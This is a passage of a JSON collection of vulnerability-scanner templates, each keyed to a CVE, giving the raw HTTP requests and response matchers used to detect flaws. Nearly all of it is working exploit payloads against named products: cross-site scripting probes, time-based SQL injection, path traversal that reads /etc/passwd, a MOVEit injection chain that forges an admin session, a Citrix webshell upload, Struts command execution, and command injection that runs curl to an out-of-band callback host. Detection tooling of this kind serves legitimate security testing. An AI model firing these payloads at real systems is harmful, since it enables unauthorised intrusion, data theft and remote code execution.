Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2023-33440'); ?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"threads":30,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=5","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site 